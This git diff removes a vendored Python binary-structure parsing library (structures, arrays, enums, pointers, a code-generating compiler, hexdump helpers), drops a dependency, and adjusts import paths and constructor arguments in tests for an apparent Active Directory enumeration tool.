- """ - s = BytesIO() - self.write(s) - return s.getvalue() - - def __getattr__(self, attr): - if attr not in self.__dict__['_type'].lookup: - raise AttributeError("Invalid attribute: %r" % attr) - - return self.__dict__['_values'][attr] - - def __setattr__(self, attr, value): - if attr not in self.__dict__['_type'].lookup: - raise AttributeError("Invalid attribute: %r" % attr) - - self.__dict__['_values'][attr] = value - - def __getitem__(self, item): - return self.__dict__['_values'][item] - - def __contains__(self, attr): - return attr in self.__dict__['_values'] - - def __repr__(self): - return '<%s %s>' % ( - self.__dict__['_type'].name, - ', '.join( - [ - '%s=%s' % (k, hex(v) if isinstance(v, (int, long)) else repr(v)) - for k, v in self.__dict__['_values'].items() - ] - ), - ) - - def __len__(self): - return len(self.dumps()) - - def _size(self, field): - return self.__dict__['_sizes'][field] - - -class PointerInstance(object): - """Like the Instance class, but for structures referenced by a pointer.""" - - def __init__(self, t, stream, addr, ctx): - self._stream = stream - self._type = t - self._addr = addr - self._ctx = ctx - self._value = None - - def _get(self): - log("Dereferencing pointer -> 0x{:016x} [{!r}]", self._addr, self._stream) - if self._addr == 0: - raise NullPointerDereference() - - if self._value is None: - pos = self._stream.tell() - self._stream.seek(self._addr) - if isinstance(self._type, Array): - r = self._type._read(self._stream, self._ctx) - else: - r = self._type._read(self._stream) - self._stream.seek(pos) - self._value = r - - return self._value - - def __getattr__(self, attr): - return getattr(self._get(), attr) - - def __str__(self): - return str(self._get()) - - def __nonzero__(self): - return self._addr != 0 - - def __repr__(self): - return "".format(self._type, self._addr) - - -class Expression(object): - """Expression parser for simple calculations in definitions.""" - - operators = [ - ('+', lambda a, b: a + b), - ('-', 
lambda a, b: a - b), - ('*', lambda a, b: a * b), - ('/', lambda a, b: a / b), - ('&', lambda a, b: a & b), - ('|', lambda a, b: a | b), - ('>>', lambda a, b: a >> b), - ('<<', lambda a, b: a << b), - ] - - def __init__(self, cstruct, expr): - self.cstruct = cstruct - self.expr = expr - - def evaluate(self, context=None): - context = context if context else {} - level = 0 - levels = [] - buf = '' - - for i in xrange(len(self.expr)): - if self.expr[i] == '(': - level += 1 - levels.append(buf) - buf = '' - continue - - if self.expr[i] == ')': - level -= 1 - val = self.evaluate_part(buf, context) - buf = levels.pop() - buf += str(val) - continue - - buf += self.expr[i] - - return self.evaluate_part(buf, context) - - def evaluate_part(self, e, v): - e = e.strip() - - for o in self.operators: - if o[0] in e: - a, b = e.rsplit(o[0], 1) - return o[1](self.evaluate_part(a, v), self.evaluate_part(b, v)) - - if e in v: - return v[e] - - if e.startswith('0x'): - return int(e, 16) - - if e in self.cstruct.consts: - return self.cstruct.consts[e] - - return int(e) - - def __repr__(self): - return self.expr - - -class BaseType(object): - """Base class for cstruct type classes.""" - - def __init__(self, cstruct): - self.cstruct = cstruct - - def reads(self, data): - """Parse the given data according to the type that implements this class. - - Args: - data: Byte string to parse. - - Returns: - The parsed value of this type. - """ - data = BytesIO(data) - return self._read(data) - - def dumps(self, data): - """Dump the given data according to the type that implements this class. - - Args: - data: Data to dump. - - Returns: - The resulting bytes. - """ - out = BytesIO() - self._write(out, data) - return out.getvalue() - - def read(self, obj, *args, **kwargs): - """Parse the given data according to the type that implements this class. - - Args: - obj: Data to parse. Can be a (byte) string or a file-like object. - - Returns: - The parsed value of this type. 
- """ - if isinstance(obj, (str, bytes, newbytes)): - return self.reads(obj) - - return self._read(obj) - - def write(self, stream, data): - """Write the given data to a writable file-like object according to the - type that implements this class. - - Args: - stream: Writable file-like object to write to. - data: Data to write. - - Returns: - The amount of bytes written. - """ - return self._write(stream, data) - - def _read(self, stream): - raise NotImplementedError() - - def _read_array(self, stream, count): - return [self._read(stream) for i in xrange(count)] - - def _read_0(self, stream): - raise NotImplementedError() - - def _write(self, stream, data): - raise NotImplementedError() - - def _write_array(self, stream, data): - num = 0 - for i in data: - num += self._write(stream, i) - return num - - def _write_0(self, stream, data): - raise NotImplementedError() - - def default(self): - """Return a default value of this type.""" - raise NotImplementedError() - - def default_array(self): - """Return a default array of this type.""" - raise NotImplementedError() - - def __getitem__(self, count): - return Array(self.cstruct, self, count) - - def __call__(self, *args, **kwargs): - if len(args) > 0: - return self.read(*args, **kwargs) - - r = self.default() - if kwargs: - for k, v in kwargs.items(): - setattr(r, k, v) - - return r - - -class RawType(BaseType): - """Base class for raw types that have a name and size.""" - - def __init__(self, cstruct, name=None, size=0): - self.name = name - self.size = size - super(RawType, self).__init__(cstruct) - - def __len__(self): - return self.size - - def __repr__(self): - if self.name: - return self.name - - return BaseType.__repr__(self) - - -class Structure(BaseType): - """Type class for structures.""" - - def __init__(self, cstruct, name, fields=None): - self.name = name - self.size = None - self.lookup = OrderedDict() - self.fields = fields if fields else [] - - for f in self.fields: - self.lookup[f.name] = f - - 
self._calc_offsets() - super(Structure, self).__init__(cstruct) - - def _calc_offsets(self): - offset = 0 - bitstype = None - bitsremaining = 0 - - for field in self.fields: - if field.bits: - if bitsremaining == 0 or field.type != bitstype: - bitstype = field.type - bitsremaining = bitstype.size * 8 - if offset is not None: - field.offset = offset - offset += bitstype.size - else: - field.offset = None - - bitsremaining -= field.bits - continue - - field.offset = offset - if offset is not None: - try: - offset += len(field.type) - except TypeError: - offset = None - - def _calc_size(self): - size = 0 - bitstype = None - bitsremaining = 0 - - for field in self.fields: - if field.bits: - if bitsremaining == 0 or field.type != bitstype: - bitstype = field.type - bitsremaining = bitstype.size * 8 - size += bitstype.size - - bitsremaining -= field.bits - continue - - fieldlen = len(field.type) - size += fieldlen - - if field.offset is not None: - size = max(size, field.offset + fieldlen) - - return size - - def _read(self, stream, *args, **kwargs): - log("[Structure::read] {} {}", self.name, self.size) - bitbuffer = BitBuffer(stream, self.cstruct.endian) - - struct_start = stream.tell() - - r = OrderedDict() - sizes = {} - for field in self.fields: - start = stream.tell() - ft = self.cstruct.resolve(field.type) - - if field.offset: - if start != struct_start + field.offset: - log( - "+ seeking to 0x{:x}+0x{:x} for {}".format( - struct_start, field.offset, field.name - ) - ) - stream.seek(struct_start + field.offset) - start = struct_start + field.offset - - if field.bits: - r[field.name] = bitbuffer.read(ft, field.bits) - continue - else: - bitbuffer.reset() - - if isinstance(ft, (Array, Pointer)): - v = ft._read(stream, r) - else: - v = ft._read(stream) - - sizes[field.name] = stream.tell() - start - r[field.name] = v - - return Instance(self, r, sizes) - - def _write(self, stream, data): - bitbuffer = BitBuffer(stream, self.cstruct.endian) - num = 0 - - for field in 
self.fields: - if field.bits: - bitbuffer.write(field.type, getattr(data, field.name), field.bits) - continue - - if bitbuffer._type: - bitbuffer.flush() - - num += field.type._write(stream, getattr(data, field.name)) - - # Flush bitbuffer - if bitbuffer._type: - bitbuffer.flush() - - return num - - def add_field(self, name, type_, offset=None): - """Add a field to this structure. - - Args: - name: The field name. - type_: The field type. - offset: The field offset. - """ - field = Field(name, type_, offset=offset) - self.fields.append(field) - self.lookup[name] = field - self.size = None - setattr(self, name, field) - - def default(self): - """Create and return an empty Instance from this structure. - - Returns: - An empty Instance from this structure. - """ - r = OrderedDict() - for field in self.fields: - r[field.name] = field.type.default() - - return Instance(self, r) - - def __len__(self): - if self.size is None: - self.size = self._calc_size() - - return self.size - - def __repr__(self): - return ''.format(self.name) - - def show(self, indent=0): - """Pretty print this structure.""" - if indent == 0: - print("struct {}".format(self.name)) - - for field in self.fields: - if field.offset is None: - offset = '0x??' 
- else: - offset = '0x{:02x}'.format(field.offset) - - print("{}+{} {} {}".format(' ' * indent, offset, field.name, field.type)) - - if isinstance(field.type, Structure): - field.type.show(indent + 1) - - -class BitBuffer(object): - """Implements a bit buffer that can read and write bit fields.""" - - def __init__(self, stream, endian): - self.stream = stream - self.endian = endian - - self._type = None - self._buffer = 0 - self._remaining = 0 - - def read(self, field_type, bits): - if self._remaining < 1 or self._type != field_type: - self._type = field_type - self._remaining = field_type.size * 8 - self._buffer = field_type._read(self.stream) - - if self.endian != '>': - v = self._buffer & ((1 << bits) - 1) - self._buffer >>= bits - self._remaining -= bits - else: - v = self._buffer & ( - ((1 << (self._remaining - bits)) - 1) ^ ((1 << self._remaining) - 1) - ) - v >>= self._remaining - bits - self._remaining -= bits - - return v - - def write(self, field_type, data, bits): - if self._remaining == 0: - self._remaining = field_type.size * 8 - self._type = field_type - - if self.endian != '>': - self._buffer |= data << (self._type.size * 8 - self._remaining) - else: - self._buffer |= data << (self._remaining - bits) - - self._remaining -= bits - - def flush(self): - self._type._write(self.stream, self._buffer) - self._type = None - self._remaining = 0 - self._buffer = 0 - - def reset(self): - self._type = None - self._buffer = 0 - self._remaining = 0 - - -class Field(object): - """Holds a structure field.""" - - def __init__(self, name, type_, bits=None, offset=None): - self.name = name - self.type = type_ - self.bits = bits - self.offset = offset - - def __repr__(self): - return ''.format(self.name, self.type) - - -class Array(BaseType): - """Implements a fixed or dynamically sized array type. - - Example: - When using the default C-style parser, the following syntax is supported: - - x[3] -> 3 -> static length. - x[] -> None -> null-terminated. 
- x[expr] -> expr -> dynamic length. - """ - - def __init__(self, cstruct, type_, count): - self.type = type_ - self.count = count - self.dynamic = isinstance(self.count, Expression) or self.count is None - - super(Array, self).__init__(cstruct) - - def _read(self, stream, context=None): - if self.count is None: - return self.type._read_0(stream) - - if self.dynamic: - count = self.count.evaluate(context) - else: - count = self.count - - return self.type._read_array(stream, max(0, count)) - - def _write(self, f, data): - if self.count is None: - return self.type._write_0(f, data) - - return self.type._write_array(f, data) - - def default(self): - if self.dynamic or self.count is None: - return [] - - return [self.type.default() for i in xrange(self.count)] - - def __repr__(self): - if self.count is None: - return '{0!r}[]'.format(self.type) - - return '{0!r}[{1}]'.format(self.type, self.count) - - def __len__(self): - if self.dynamic: - raise TypeError("Dynamic size") - - return len(self.type) * self.count - - -class PackedType(RawType): - """Implements a packed type that uses Python struct packing characters.""" - - def __init__(self, cstruct, name, size, packchar): - self.packchar = packchar - super(PackedType, self).__init__(cstruct, name, size) - - def _read(self, stream): - return self._read_array(stream, 1)[0] - - def _read_array(self, stream, count): - length = self.size * count - data = stream.read(length) - fmt = self.cstruct.endian + str(count) + self.packchar - if len(data) != length: - raise EOFError("Read %d bytes, but expected %d" % (len(data), length)) - - return list(struct.unpack(fmt, data)) - - def _read_0(self, stream): - r = [] - while True: - d = stream.read(self.size) - v = struct.unpack(self.cstruct.endian + self.packchar, d)[0] - - if v == 0: - break - - r.append(v) - - return r - - def _write(self, stream, data): - return self._write_array(stream, [data]) - - def _write_array(self, stream, data): - fmt = self.cstruct.endian + str(len(data)) 
+ self.packchar - return stream.write(struct.pack(fmt, *data)) - - def _write_0(self, stream, data): - return self._write_array(stream, data + [0]) - - def default(self): - return 0 - - def default_array(self, count): - return [0] * count - - -class CharType(RawType): - """Implements a character type that can properly handle strings.""" - - def __init__(self, cstruct): - super(CharType, self).__init__(cstruct, 'char', 1) - - def _read(self, stream): - return stream.read(1) - - def _read_array(self, stream, count): - if count == 0: - return b'' - - return stream.read(count) - - def _read_0(self, stream): - r = [] - while True: - c = stream.read(1) - if c == b'': - raise EOFError() - - if c == b'\x00': - break - - r.append(c) - - return b''.join(r) - - def _write(self, stream, data): - if isinstance(data, int): - data = chr(data) - - if PY3 and isinstance(data, str): - data = data.encode('latin-1') - - return stream.write(data) - - def _write_array(self, stream, data): - return self._write(stream, data) - - def _write_0(self, stream, data): - return self._write(stream, data + b'\x00') - - def default(self): - return b'\x00' - - def default_array(self, count): - return b'\x00' * count - - -class WcharType(RawType): - """Implements a wide-character type.""" - - def __init__(self, cstruct): - super(WcharType, self).__init__(cstruct, 'wchar', 2) - - @property - def encoding(self): - if self.cstruct.endian == '<': - return 'utf-16-le' - elif self.cstruct.endian == '>': - return 'utf-16-be' - - def _read(self, stream): - return stream.read(2).decode(self.encoding) - - def _read_array(self, stream, count): - if count == 0: - return u'' - - data = stream.read(2 * count) - return data.decode(self.encoding) - - def _read_0(self, stream): - r = b'' - while True: - c = stream.read(2) - - if len(c) != 2: - raise EOFError() - - if c == b'\x00\x00': - break - - r += c - - return r.decode(self.encoding) - - def _write(self, stream, data): - return 
stream.write(data.encode(self.encoding)) - - def _write_array(self, stream, data): - return self._write(stream, data) - - def _write_0(self, stream, data): - return self._write(stream, data + u'\x00') - - def default(self): - return u'\x00' - - def default_array(self, count): - return u'\x00' * count - - -class BytesInteger(RawType): - """Implements an integer type that can span an arbitrary amount of bytes.""" - - def __init__(self, cstruct, name, size, signed): - self.signed = signed - super(BytesInteger, self).__init__(cstruct, name, size) - - @staticmethod - def parse(buf, size, count, signed, endian): - nums = [] - - for c in xrange(count): - num = 0 - data = buf[c * size:(c + 1) * size] - if endian == '<': - data = b''.join(data[i:i + 1] for i in reversed(xrange(len(data)))) - - ints = list(data) if PY3 else map(ord, data) - for i in ints: - num = (num << 8) | i - - if signed and num & 1 << (size * 8 - 1): - bias = 1 << (size * 8 - 1) - num -= bias * 2 - - nums.append(num) - - return nums - - @staticmethod - def pack(data, size, endian): - buf = [] - for i in data: - num = int(i) - if num < 0: - num += 1 << (size * 8) - - d = [b'\x00'] * size - i = size - 1 - - while i >= 0: - b = num & 255 - d[i] = bytes((b,)) if PY3 else chr(b) - num >>= 8 - i -= 1 - - if endian == '<': - d = b''.join(d[i:i + 1][0] for i in reversed(xrange(len(d)))) - else: - d = b''.join(d) - - buf.append(d) - - return b''.join(buf) - - def _read(self, stream): - return self.parse(stream.read(self.size * 1), self.size, 1, self.signed, self.cstruct.endian)[0] - - def _read_array(self, stream, count): - return self.parse(stream.read(self.size * count), self.size, count, self.signed, self.cstruct.endian) - - def _read_0(self, stream): - r = [] - while True: - v = self._read(stream) - if v == 0: - break - r.append(v) - - return r - - def _write(self, stream, data): - return stream.write(self.pack([data], self.size, self.cstruct.endian)) - - def _write_array(self, stream, data): - return 
stream.write(self.pack(data, self.size, self.cstruct.endian)) - - def _write_0(self, stream, data): - return self._write_array(stream, data + [0]) - - def default(self): - return 0 - - def default_array(self, count): - return [0] * count - - -class Enum(RawType): - """Implements an Enum type. - - Enums can be made using any type. The API for accessing enums and their - values is very similar to Python 3 native enums. - - Example: - When using the default C-style parser, the following syntax is supported: - - enum [: ] { - - }; - - For example, an enum that has A=1, B=5 and C=6 could be written like so: - - enum Test : uint16 { - A, B=5, C - }; - """ - - def __init__(self, cstruct, name, type_, values): - self.type = type_ - self.values = values - self.reverse = {} - - for k, v in values.items(): - self.reverse[v] = k - - super(Enum, self).__init__(cstruct, name, len(self.type)) - - def __call__(self, value): - return EnumInstance(self, value) - - def _read(self, stream): - v = self.type._read(stream) - return self(v) - - def _read_array(self, stream, count): - return list(map(self, self.type._read_array(stream, count))) - - def _read_0(self, stream): - return list(map(self, self.type._read_0(stream))) - - def _write(self, stream, data): - data = data.value if isinstance(data, EnumInstance) else data - return self.type._write(stream, data) - - def _write_array(self, stream, data): - data = [d.value if isinstance(d, EnumInstance) else d for d in data] - return self.type._write_array(stream, data) - - def _write_0(self, stream, data): - data = [d.value if isinstance(d, EnumInstance) else d for d in data] - return self.type._write_0(stream, data) - - def default(self): - return self(0) - - def __getitem__(self, attr): - if attr in self.values: - return self(self.values[attr]) - - raise KeyError(attr) - - def __getattr__(self, attr): - if attr in self.values: - return self(self.values[attr]) - - raise AttributeError(attr) - - def __contains__(self, attr): - return attr 
in self.values - - -class EnumInstance(object): - """Implements a value instance of an Enum""" - - def __init__(self, enum, value): - self.enum = enum - self.value = value - - @property - def name(self): - if self.value not in self.enum.reverse: - return '{}_{}'.format(self.enum.name, self.value) - return self.enum.reverse[self.value] - - def __eq__(self, value): - if isinstance(value, EnumInstance) and value.enum is not self.enum: - return False - - if hasattr(value, 'value'): - value = value.value - - return self.value == value - - def __ne__(self, value): - return self.__eq__(value) is False - - def __hash__(self): - return hash((self.enum, self.value)) - - def __str__(self): - return '{}.{}'.format(self.enum.name, self.name) - - def __repr__(self): - return '<{}.{}: {}>'.format(self.enum.name, self.name, self.value) - - -class Union(RawType): - def __init__(self, cstruct): - self.cstruct = cstruct - super(Union, self).__init__(cstruct) - - def _read(self, stream): - raise NotImplementedError() - - -class Pointer(RawType): - """Implements a pointer to some other type.""" - - def __init__(self, cstruct, target): - self.cstruct = cstruct - self.type = target - super(Pointer, self).__init__(cstruct) - - def _read(self, stream, ctx): - addr = self.cstruct.pointer(stream) - return PointerInstance(self.type, stream, addr, ctx) - - def __len__(self): - return len(self.cstruct.pointer) - - def __repr__(self): - return ''.format(self.type) - - -class VoidType(RawType): - """Implements a void type.""" - - def __init__(self): - super(VoidType, self).__init__(None, 'void', 0) - - def _read(self, stream): - return None - - -def ctypes(structure): - """Create ctypes structures from cstruct structures.""" - fields = [] - for field in structure.fields: - t = ctypes_type(field.type) - fields.append((field.name, t)) - - tt = type(structure.name, (_ctypes.Structure, ), {"_fields_": fields}) - return tt - - -def ctypes_type(t): - mapping = { - "I": _ctypes.c_ulong, - "i": 
_ctypes.c_long, - "b": _ctypes.c_int8, - } - - if isinstance(t, PackedType): - return mapping[t.packchar] - - if isinstance(t, CharType): - return _ctypes.c_char - - if isinstance(t, Array): - subtype = ctypes_type(t._type) - return subtype * t.count - - if isinstance(t, Pointer): - subtype = ctypes_type(t._target) - return ctypes.POINTER(subtype) - - raise NotImplementedError("Type not implemented: %s" % t.__class__.__name__) - - -class Compiler(object): - """Compiler for cstruct structures. Creates somewhat optimized parsing code.""" - - def __init__(self, cstruct): - self.cstruct = cstruct - - def compile(self, structure): - source = self.gen_struct_class(structure) - c = compile(source, '', 'exec') - - env = { - 'OrderedDict': OrderedDict, - 'Structure': Structure, - 'Instance': Instance, - 'Expression': Expression, - 'EnumInstance': EnumInstance, - 'PointerInstance': PointerInstance, - 'BytesInteger': BytesInteger, - 'BitBuffer': BitBuffer, - 'struct': struct, - 'xrange': xrange, - } - - exec(c, env) - sc = env[structure.name](self.cstruct, structure, source) - - return sc - - def gen_struct_class(self, structure): - blocks = [] - classes = [] - cur_block = [] - read_size = 0 - prev_was_bits = False - - for field in structure.fields: - ft = self.cstruct.resolve(field.type) - - if not isinstance( - ft, - ( - Structure, - Pointer, - Enum, - Array, - PackedType, - CharType, - WcharType, - BytesInteger, - ), - ): - raise CompilerError("Unsupported type for compiler: {}".format(ft)) - - if isinstance(ft, Structure) or ( - isinstance(ft, Array) and isinstance(ft.type, Structure) - ): - if cur_block: - blocks.append(self.gen_read_block(read_size, cur_block)) - - struct_read = 's = stream.tell()\n' - if isinstance(ft, Array): - num = ft.count - - if isinstance(num, Expression): - num = 'max(0, Expression(self.cstruct, "{expr}").evaluate(r))'.format( - expr=num.expr - ) - - struct_read += ( - 'r["{name}"] = []\n' - 'for _ in xrange({num}):\n' - ' 
r["{name}"].append(self.cstruct.{struct_name}._read(stream))\n'.format( - name=field.name, num=num, struct_name=ft.type.name - ) - ) - else: - struct_read += 'r["{name}"] = self.cstruct.{struct_name}._read(stream)\n'.format( - name=field.name, struct_name=ft.name - ) - - struct_read += 'sizes["{name}"] = stream.tell() - s'.format( - name=field.name - ) - blocks.append(struct_read) - read_size = 0 - cur_block = [] - continue - - if field.bits: - if cur_block: - blocks.append(self.gen_read_block(read_size, cur_block)) - - blocks.append( - 'r["{name}"] = bitreader.read(self.cstruct.{type_name}, {bits})'.format( - name=field.name, type_name=field.type.name, bits=field.bits - ) - ) - read_size = 0 - cur_block = [] - prev_was_bits = True - continue - elif prev_was_bits: - blocks.append('bitreader.reset()') - prev_was_bits = False - - try: - count = len(ft) - read_size += count - cur_block.append(field) - except Exception: - if cur_block: - blocks.append(self.gen_read_block(read_size, cur_block)) - blocks.append(self.gen_dynamic_block(field)) - read_size = 0 - cur_block = [] - - if len(cur_block): - blocks.append(self.gen_read_block(read_size, cur_block)) - - read_code = '\n\n'.join(blocks) - read_code = '\n'.join([' ' * 2 + line for line in read_code.split('\n')]) - - classes.append(COMPILE_TEMPL.format(name=structure.name, read_code=read_code)) - return '\n\n'.join(classes) - - def gen_read_block(self, size, block): - templ = ( - 'buf = stream.read({size})\n' - 'if len(buf) != {size}: raise EOFError()\n' - 'data = struct.unpack(self.cstruct.endian + "{{}}", buf)\n' - '{{}}'.format(size=size) - ) - readcode = [] - fmt = [] - - curtype = None - curcount = 0 - - buf_offset = 0 - data_offset = 0 - - for field in block: - ft = self.cstruct.resolve(field.type) - t = ft - count = 1 - data_count = 1 - read_slice = '' - - if isinstance(t, Enum): - t = t.type - elif isinstance(t, Pointer): - t = self.cstruct.pointer - - if isinstance(ft, Array): - count = t.count - data_count = 
count - t = t.type - - if isinstance(t, Enum): - t = t.type - elif isinstance(t, Pointer): - t = self.cstruct.pointer - - if isinstance(t, (CharType, WcharType, BytesInteger)): - read_slice = '{}:{}'.format( - buf_offset, buf_offset + (count * t.size) - ) - else: - read_slice = '{}:{}'.format(data_offset, data_offset + count) - elif isinstance(t, CharType): - read_slice = str(buf_offset) - elif isinstance(t, (WcharType, BytesInteger)): - read_slice = '{}:{}'.format(buf_offset, buf_offset + t.size) - else: - read_slice = str(data_offset) - - if not curtype: - if isinstance(t, PackedType): - curtype = t.packchar - else: - curtype = 'x' - - if isinstance(t, (PackedType, CharType, WcharType, BytesInteger, Enum)): - charcount = count - - if isinstance(t, (CharType, WcharType, BytesInteger)): - data_count = 0 - packchar = 'x' - charcount *= t.size - else: - packchar = t.packchar - - if curtype != packchar: - fmt.append('{}{}'.format(curcount, curtype)) - curcount = 0 - - curcount += charcount - curtype = packchar - - getter = '' - if isinstance(t, BytesInteger): - getter = 'BytesInteger.parse(buf[{slice}], {size}, {count}, {signed}, self.cstruct.endian){data_slice}'.format( - slice=read_slice, - size=t.size, - count=count, - signed=t.signed, - data_slice='[0]' if count == 1 else '', - ) - elif isinstance(t, (CharType, WcharType)): - getter = 'buf[{}]'.format(read_slice) - if isinstance(t, WcharType): - getter += ".decode('utf-16-le' if self.cstruct.endian == '<' else 'utf-16-be')" - else: - getter = 'data[{}]'.format(read_slice) - - if isinstance(ft, Enum): - getter = 'EnumInstance(self.cstruct.{type_name}, {getter})'.format( - type_name=ft.name, getter=getter - ) - elif isinstance(ft, Array) and isinstance(ft.type, Enum): - getter = '[EnumInstance(self.cstruct.{type_name}, d) for d in {getter}]'.format( - type_name=ft.type.name, getter=getter - ) - elif isinstance(ft, Pointer): - getter = 'PointerInstance(self.cstruct.{type_name}, stream, {getter}, r)'.format( - 
type_name=ft.type.name, getter=getter - ) - elif isinstance(ft, Array) and isinstance(ft.type, Pointer): - getter = '[PointerInstance(self.cstruct.{type_name}, stream, d, r) for d in {getter}]'.format( - type_name=ft.type.name, getter=getter - ) - elif isinstance(ft, Array) and isinstance(t, PackedType): - getter = 'list({})'.format(getter) - - readcode.append( - 'r["{name}"] = {getter}'.format(name=field.name, getter=getter) - ) - readcode.append( - 'sizes["{name}"] = {size}'.format(name=field.name, size=count * t.size) - ) - - data_offset += data_count - buf_offset += count * t.size - - if curcount: - fmt.append('{}{}'.format(curcount, curtype)) - - return templ.format(''.join(fmt), '\n'.join(readcode)) - - def gen_dynamic_block(self, field): - if not isinstance(field.type, Array): - raise CompilerError( - "Only Array can be dynamic, got {!r}".format(field.type) - ) - - t = field.type.type - reader = None - - if not field.type.count: # Null terminated - if isinstance(t, PackedType): - reader = ( - 't = []\nwhile True:\n' - ' d = stream.read({size})\n' - ' if len(d) != {size}: raise EOFError()\n' - ' v = struct.unpack(self.cstruct.endian + "{packchar}", d)[0]\n' - ' if v == 0: break\n' - ' t.append(v)'.format(size=t.size, packchar=t.packchar) - ) - - elif isinstance(t, (CharType, WcharType)): - reader = ( - 't = []\n' - 'while True:\n' - ' c = stream.read({size})\n' - ' if len(c) != {size}: raise EOFError()\n' - ' if c == b"{null}": break\n' - ' t.append(c)\nt = b"".join(t)'.format( - size=t.size, null='\\x00' * t.size - ) - ) - - if isinstance(t, WcharType): - reader += ".decode('utf-16-le' if self.cstruct.endian == '<' else 'utf-16-be')" - elif isinstance(t, BytesInteger): - reader = ( - 't = []\n' - 'while True:\n' - ' d = stream.read({size})\n' - ' if len(d) != {size}: raise EOFError()\n' - ' v = BytesInteger.parse(d, {size}, 1, {signed}, self.cstruct.endian)\n' - ' if v == 0: break\n' - ' t.append(v)'.format(size=t.size, signed=t.signed) - ) - - return 
'{reader}\nr["{name}"] = t\nsizes["{name}"] = len(t)'.format( - reader=reader, name=field.name - ) - else: - expr = field.type.count.expr - expr_read = ( - 'dynsize = max(0, Expression(self.cstruct, "{expr}").evaluate(r))\n' - 'buf = stream.read(dynsize * {type_size})\n' - 'if len(buf) != dynsize * {type_size}: raise EOFError()\n' - 'r["{name}"] = {{reader}}\n' - 'sizes["{name}"] = dynsize * {type_size}'.format( - expr=expr, name=field.name, type_size=t.size - ) - ) - - if isinstance(t, PackedType): - reader = 'list(struct.unpack(self.cstruct.endian + "{{:d}}{packchar}".format(dynsize), buf))'.format( - packchar=t.packchar, type_size=t.size - ) - elif isinstance(t, (CharType, WcharType)): - reader = 'buf' - if isinstance(t, WcharType): - reader += ".decode('utf-16-le' if self.cstruct.endian == '<' else 'utf-16-be')" - elif isinstance(t, BytesInteger): - reader = 'BytesInteger.parse(buf, {size}, dynsize, {signed}, self.cstruct.endian)'.format( - size=t.size, signed=t.signed - ) - - return expr_read.format(reader=reader, size=None) - - -def hexdump(s, palette=None, offset=0, prefix=""): - """Hexdump some data. - - Args: - s: Bytes to hexdump. - palette: Colorize the hexdump using this color pattern. - offset: Byte offset of the hexdump. - prefix: Optional prefix. - """ - if palette: - palette = palette[::-1] - - remaining = 0 - active = None - - for i in xrange(0, len(s), 16): - vals = "" - chars = [] - for j in xrange(16): - if not active and palette: - remaining, active = palette.pop() - vals += active - elif active and j == 0: - vals += active - - if i + j >= len(s): - vals += " " - else: - c = s[i + j] - c = chr(c) if PY3 else c - p = c if c in PRINTABLE else "." 
- - if active: - vals += "{:02x}".format(ord(c)) - chars.append(active + p + COLOR_NORMAL) - else: - vals += "{:02x}".format(ord(c)) - chars.append(p) - - remaining -= 1 - if remaining == 0: - active = None - - if palette is not None: - vals += COLOR_NORMAL - - if j == 15: - if palette is not None: - vals += COLOR_NORMAL - - vals += " " - - if j == 7: - vals += " " - - chars = "".join(chars) - print("{}{:08x} {:48s} {}".format(prefix, offset + i, vals, chars)) - - -def dumpstruct(t, data=None, offset=0): - """Dump a structure or parsed structure instance. - - Prints a colorized hexdump and parsed structure output. - - Args: - t: Structure or Instance to dump. - data: Bytes to parse the Structure on, if t is not a parsed Instance. - offset: Byte offset of the hexdump. - """ - colors = [ - (COLOR_RED, COLOR_BG_RED), - (COLOR_GREEN, COLOR_BG_GREEN), - (COLOR_YELLOW, COLOR_BG_YELLOW), - (COLOR_BLUE, COLOR_BG_BLUE), - (COLOR_PURPLE, COLOR_BG_PURPLE), - (COLOR_CYAN, COLOR_BG_CYAN), - (COLOR_WHITE, COLOR_BG_WHITE), - ] - - if isinstance(t, Instance): - g = t - t = t._type - data = g.dumps() - elif isinstance(t, Structure) and data: - g = t(data) - else: - raise ValueError("Invalid arguments") - - palette = [] - ci = 0 - out = "struct {}".format(t.name) + ":\n" - for field in g._type.fields: - fg, bg = colors[ci % len(colors)] - palette.append((g._size(field.name), bg)) - ci += 1 - - v = getattr(g, field.name) - if isinstance(v, str): - v = repr(v) - elif isinstance(v, int): - v = hex(v) - elif isinstance(v, list): - v = pprint.pformat(v) - if '\n' in v: - v = v.replace('\n', '\n{}'.format(' ' * (len(field.name) + 4))) - - out += "- {}{}{}: {}\n".format(fg, field.name, COLOR_NORMAL, v) - - print() - hexdump(data, palette, offset=offset) - print() - print(out) diff --git a/requirements.txt b/requirements.txt index 508978d..541f735 100644 --- a/requirements.txt +++ b/requirements.txt @@ -10,7 +10,6 @@ Jinja2==2.11.2 ldap3==2.8.1 ldapdomaindump==0.9.3 MarkupSafe==1.1.1 
-progressbar==2.5 pyasn1==0.4.8 pycparser==2.20 pycryptodomex==3.9.8 diff --git a/test/test_ade.py b/test/test_ade.py index b20394f..6b31a38 100644 --- a/test/test_ade.py +++ b/test/test_ade.py @@ -1,4 +1,4 @@ -import ade +from ade import ade import pytest import ldap3 import contextlib @@ -11,7 +11,7 @@ def test_enumAD_runWithoutCreds(): out = io.StringIO() with contextlib.redirect_stdout(out): with pytest.raises(SystemExit) as ldaperr: - adeEnum = ade.EnumAD('domain.local', True, False, False, False, False, False, False, True) + adeEnum = ade.EnumAD('domain.local', True, False, False, False, False, False, False, True, False, False) adeEnum.runWithoutCreds() assert "ERROR" in out.getvalue() assert "Failed to bind to LDAPS server: " in out.getvalue() \ No newline at end of file diff --git a/test/test_imports.py b/test/test_imports.py index 56e66af..3651c05 100644 --- a/test/test_imports.py +++ b/test/test_imports.py @@ -1,13 +1,12 @@ def test_ade_imports(): - import ade + from ade import ade import termcolor import argparse import textwrap import sys import re import ldap3 - import progressbar import ldap3 import impacket import getpass